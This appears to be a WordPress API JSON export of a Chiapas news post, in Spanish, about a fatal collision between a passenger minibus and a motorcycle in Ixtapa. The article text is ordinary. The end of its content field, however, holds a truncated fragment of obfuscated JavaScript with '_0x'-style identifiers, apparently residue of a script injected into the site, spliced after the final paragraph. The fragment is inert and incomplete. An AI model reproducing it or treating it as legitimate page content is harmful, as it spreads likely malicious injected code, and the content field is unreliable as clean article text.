{"id":17398,"date":"2024-08-21T05:16:21","date_gmt":"2024-08-21T05:16:21","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17398"},"modified":"2024-08-21T05:16:22","modified_gmt":"2024-08-21T05:16:22","slug":"choque-entre-colectivo-y-motociclista-en-ixtapa-deja-un-muerto","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17398","title":{"rendered":"Choque entre colectivo y motociclista en Ixtapa deja un muerto"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"509\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724217146390-1.jpg\" alt=\"\" class=\"wp-image-17399\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724217146390-1.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724217146390-1-300x212.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 20 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la tarde ocurri\u00f3 un choque entre un colectivo de la ruta Soyal\u00f3-Tuxtla y una motocicleta.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de la motocicleta Italika de color negro se estrell\u00f3 de lleno contra la Urvan Nissan.<\/p>\n\n\n\n<p>Por el fuerte impacto el conductor de la moto muri\u00f3 de manera instant\u00e1nea y su acompa\u00f1ante result\u00f3 herido de gravedad.<\/p>\n\n\n\n<p>En el lugar se dio a conocer que, el velocipedo invadi\u00f3 carril al intentar rebasar.<\/p>\n\n\n\n<p>Al lugar arribaron peritos de la Fiscal\u00eda General del Estado para realizar las diligencias correspondientes, levantar el cuerpo y lo trasladaron al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 20 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la tarde ocurri\u00f3 un choque entre un colectivo de la ruta Soyal\u00f3-Tuxtla y una motocicleta. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de la motocicleta Italika de color negro se estrell\u00f3 de lleno contra la Urvan &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17397,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-17398","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17398","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17398"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17398\/revisions"}],"predecessor-version":[{"id":17400,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17398\/revisions\/17400"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17397"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17398"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17398"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17398"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}